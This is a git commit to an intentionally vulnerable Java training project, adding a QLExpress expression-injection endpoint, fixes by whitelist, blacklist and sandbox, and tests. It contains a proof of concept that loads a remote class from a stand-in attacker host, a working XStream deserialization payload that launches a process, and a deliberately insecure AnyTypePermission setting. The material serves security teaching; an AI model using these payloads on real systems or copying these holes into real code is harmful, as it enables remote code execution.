Add qlexpress and some test cases.

JoyChou · JoyChou · commit 457d703e8f89 · 2023-12-28T19:38:47.000+08:00
diff --git a/README.md b/README.md
@@ -3,7 +3,7 @@
 
 Java sec code is a very powerful and friendly project for learning Java vulnerability code.
 
-[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md) 😋[Alibaba Security Purple Team Recruitment](https://talent.alibaba.com/off-campus-position/937731?trace=qrcode_share)
+[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md) 😋
 
 ## Introduce
 
@@ -41,6 +41,7 @@ Sort by letter.
 - [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
+- [QLExpress](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/QLExpress.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
   - Runtime
   - ProcessBuilder
@@ -146,7 +147,7 @@ Viarus
 Example:
 
 ```
-http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
+http://localhost:8080/java-sec-code-1.0.0/rce/runtime/exec?cmd=whoami
 ```
 
 return:
diff --git a/README_zh.md b/README_zh.md
@@ -2,7 +2,7 @@
 
 对于学习Java漏洞代码来说，`Java Sec Code`是一个非常强大且友好的项目。
 
-[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md) 😋[阿里集团安全紫军招聘](https://talent.alibaba.com/off-campus-position/937731?trace=qrcode_share)
+[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md) 😋
 
 ## 介绍
 
@@ -36,6 +36,7 @@ joychou/joychou123
 - [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
+- [QLExpress](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/QLExpress.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
     - Runtime
     - ProcessBuilder  
@@ -138,7 +139,7 @@ Viarus
 例子：
 
 ```
-http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
+http://localhost:8080/java-sec-code-1.0.0/rce/runtime/exec?cmd=whoami
 ```
  
 返回：
diff --git a/src/main/java/org/joychou/controller/QLExpress.java b/src/main/java/org/joychou/controller/QLExpress.java
@@ -0,0 +1,44 @@
+package org.joychou.controller;
+
+import com.ql.util.express.DefaultContext;
+import com.ql.util.express.ExpressRunner;
+import com.ql.util.express.config.QLExpressRunStrategy;
+import org.joychou.util.WebUtils;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.servlet.http.HttpServletRequest;
+
+@RestController(value = "/qlexpress")
+public class QLExpress {
+
+    /**
+     * url = 'http://sb.dog:8888/';
+     * classLoader = new java.net.URLClassLoader([new java.net.URL(url)]);
+     * classLoader.loadClass('Hello').newInstance();
+     */
+    @RequestMapping("/vuln1")
+    public String vuln1(HttpServletRequest req) throws Exception{
+        String express = WebUtils.getRequestBody(req);
+        System.out.println(express);
+        ExpressRunner runner = new ExpressRunner();
+        DefaultContext<String, Object> context = new DefaultContext<String, Object>();
+        Object r = runner.execute(express, context, null, true, false);
+        System.out.println(r);
+        return r.toString();
+    }
+
+    @RequestMapping("/sec")
+    public String sec(HttpServletRequest req) throws Exception{
+        String express = WebUtils.getRequestBody(req);
+        System.out.println(express);
+        ExpressRunner runner = new ExpressRunner();
+        QLExpressRunStrategy.setForbidInvokeSecurityRiskMethods(true);
+        // Can only call java.lang.String#length()
+        QLExpressRunStrategy.addSecureMethod(String.class, "length");
+        DefaultContext<String, Object> context = new DefaultContext<String, Object>();
+        Object r = runner.execute(express, context, null, true, false);
+        System.out.println(r);
+        return r.toString();
+    }
+}
diff --git a/src/main/java/org/joychou/controller/XStreamRce.java b/src/main/java/org/joychou/controller/XStreamRce.java
@@ -2,6 +2,7 @@
 
 import com.thoughtworks.xstream.XStream;
 import com.thoughtworks.xstream.io.xml.DomDriver;
+import com.thoughtworks.xstream.security.AnyTypePermission;
 import org.joychou.dao.User;
 import org.joychou.util.WebUtils;
 import org.springframework.web.bind.annotation.PostMapping;
@@ -24,20 +25,9 @@ public class XStreamRce {
     public String parseXml(HttpServletRequest request) throws Exception {
         String xml = WebUtils.getRequestBody(request);
         XStream xstream = new XStream(new DomDriver());
+        xstream.addPermission(AnyTypePermission.ANY); // This will cause all XStream versions to be affected.
         xstream.fromXML(xml);
         return "xstream";
     }
 
-    public static void main(String[] args) {
-        User user = new User();
-        user.setId(0);
-        user.setUsername("admin");
-
-        XStream xstream = new XStream(new DomDriver());
-        String xml = xstream.toXML(user); // Serialize
-        System.out.println(xml);
-
-        user = (User) xstream.fromXML(xml); // Deserialize
-        System.out.println(user.getId() + ": " + user.getUsername());
-    }
 }
diff --git a/src/main/java/org/joychou/dao/User.java b/src/main/java/org/joychou/dao/User.java
@@ -1,32 +1,11 @@
 package org.joychou.dao;
 
-import java.io.Serializable;
+import lombok.Data;
 
-public class User implements Serializable {
-    private static final long serialVersionUID = 1L;
+
+@Data
+public class User {
     private Integer id;
     private String username;
     private String password;
-
-    public Integer getId() {
-        return id;
-    }
-    public void setId(Integer id) {
-        this.id = id;
-    }
-
-    public String getUsername() {
-        return username;
-    }
-    public void setUsername(String username) {
-        this.username = username;
-    }
-
-    public String getPassword() {
-        return password;
-    }
-    public void setPassword(String password) {
-        this.password = password;
-    }
-
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
@@ -46,7 +46,7 @@ swagger.enable = true
 
 
 ### no need to login page begins ###
-joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**, /shiro/**, /ssrf/**, /spel/**
+joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**, /shiro/**, /ssrf/**, /spel/**, /qlexpress/**
 ### no need to login page ends ###
 
 
diff --git a/src/main/test/org/test/QLExpressTest.java b/src/main/test/org/test/QLExpressTest.java
@@ -0,0 +1,103 @@
+package org.test;
+
+import com.ql.util.express.DefaultContext;
+import com.ql.util.express.ExpressRunner;
+import com.ql.util.express.IExpressContext;
+import com.ql.util.express.config.QLExpressRunStrategy;
+import org.junit.Test;
+
+/**
+ * <a href="https://github.com/alibaba/QLExpress">QLExpress</a> security test cases.
+ */
+public class QLExpressTest {
+
+    private static final String poc = "url = 'http://sb.dog:8888/'; classLoader = new java.net.URLClassLoader([new java.net.URL(url)]);classLoader.loadClass('Hello').newInstance();";
+
+    /**
+     * basic usage
+     */
+    @Test
+    public void basicUsage() throws Exception{
+        ExpressRunner runner = new ExpressRunner();
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        context.put("a", 1);
+        context.put("b", 2);
+        Object r = runner.execute("a+b", context, null, true, false);
+        System.out.println(r);  // print 3
+    }
+
+    /**
+     * Test case of /qlexpress/vuln1. Use URLClassLoader to load evil class.
+     */
+    @Test
+    public void vuln1() throws Exception {
+        System.out.println(poc);
+        ExpressRunner runner = new ExpressRunner();
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        Object r = runner.execute(poc, context, null, true, false);
+        System.out.println(r);
+    }
+
+    /**
+     * fix method by using class and method whitelist.
+     */
+    @Test
+    public void sec01() throws Exception {
+        System.out.println(poc);
+        ExpressRunner runner = new ExpressRunner();
+        QLExpressRunStrategy.setForbidInvokeSecurityRiskMethods(true);
+        QLExpressRunStrategy.addSecureMethod(String.class, "length");
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        Object r1 = runner.execute("'abc'.length()", context, null, true, false);
+        System.out.println(r1);
+        Object r2 = runner.execute(poc, context, null, true, false);
+        System.out.println(r2);
+    }
+
+    /**
+     * <p>Fix method by using class and method blacklist. It may exist bypass. </p>
+     *
+     * <p>Default blacklist:
+     *  <ul>
+     *     <li>System.class.getName() + ".exit"</li>
+     *     <li>ProcessBuilder.class.getName() + ".start"</li>
+     *     <li>Method.class.getName() + ".invoke"</li>
+     *     <li>Class.class.getName() + ".forName"</li>
+     *     <li>ClassLoader.class.getName() + ".loadClass"</li>
+     *     <li>ClassLoader.class.getName() + ".findClass"</li>
+     *     <li>ClassLoader.class.getName() + ".defineClass"</li>
+     *     <li>ClassLoader.class.getName() + ".getSystemClassLoader"</li>
+     *     <li>javax.naming.InitialContext.lookup</li>
+     *     <li>com.sun.rowset.JdbcRowSetImpl.setDataSourceName</li>
+     *     <li>com.sun.rowset.JdbcRowSetImpl.setAutoCommit</li>
+     *     <li>QLExpressRunStrategy.class.getName() + ".setForbidInvokeSecurityRiskMethods"</li>
+     *     <li>jdk.jshell.JShell.create</li>
+     *     <li>javax.script.ScriptEngineManager.getEngineByName</li>
+     *     <li>org.springframework.jndi.JndiLocatorDelegate.lookup</li>
+     *  </ul>
+     * </p>
+     */
+    @Test
+    public void sec02() throws Exception {
+        System.out.println(poc);
+        ExpressRunner runner = new ExpressRunner();
+        QLExpressRunStrategy.setForbidInvokeSecurityRiskMethods(true);
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        Object r = runner.execute(poc, context, null, true, false);
+        System.out.println(r);
+    }
+
+
+    /**
+     * <p>Fix method by using sandbox. </p>
+     */
+    @Test
+    public void sec03() throws Exception {
+        System.out.println(poc);
+        ExpressRunner runner = new ExpressRunner();
+        QLExpressRunStrategy.setSandBoxMode(true);
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        Object r = runner.execute(poc, context, null, true, false);
+        System.out.println(r);
+    }
+}
diff --git a/src/main/test/org/test/XStreamTest.java b/src/main/test/org/test/XStreamTest.java
@@ -0,0 +1,70 @@
+package org.test;
+
+import com.thoughtworks.xstream.XStream;
+import com.thoughtworks.xstream.io.xml.DomDriver;
+import com.thoughtworks.xstream.security.AnyTypePermission;
+import org.joychou.dao.User;
+import org.junit.Test;
+
+public class XStreamTest {
+
+    private static final String poc_xml = "<sorted-set>\n" +
+            "    <string>foo</string>\n" +
+            "    <dynamic-proxy>\n" +
+            "        <interface>java.lang.Comparable</interface>\n" +
+            "        <handler class=\"java.beans.EventHandler\">\n" +
+            "            <target class=\"java.lang.ProcessBuilder\">\n" +
+            "                <command>\n" +
+            "                    <string>Open</string>\n" +
+            "                    <string>-a</string>\n" +
+            "                    <string>Calculator</string>\n" +
+            "                </command>\n" +
+            "            </target>\n" +
+            "            <action>start</action>\n" +
+            "        </handler>\n" +
+            "    </dynamic-proxy>\n" +
+            "</sorted-set>";
+
+
+    /**
+     * XStream basic usage.
+     */
+    @Test
+    public void basicUsage() {
+        User user = new User();
+        user.setId(0);
+        user.setUsername("admin");
+
+        XStream xstream = new XStream(new DomDriver());
+        String xml = xstream.toXML(user); // Serialize
+        System.out.println(xml);
+
+        // High version xstream needs set allowTypes
+        xstream.allowTypes(new Class[]{User.class});
+        user = (User) xstream.fromXML(xml); // Deserialize
+        System.out.println(user.getId() + ": " + user.getUsername());
+    }
+
+    /**
+     * Command execute
+     */
+    @Test
+    public void vuln01() {
+        System.out.println(poc_xml);
+        XStream xstream = new XStream();
+        xstream.addPermission(AnyTypePermission.ANY); // Insecure configuration
+        xstream.fromXML(poc_xml); // Deserialize
+    }
+
+
+    /**
+     * Security code. XStream version: 1.4.20
+     */
+    @Test
+    public void sec01() {
+        System.out.println(poc_xml);
+        XStream xstream = new XStream();
+        xstream.fromXML(poc_xml); // Deserialize
+    }
+
+}
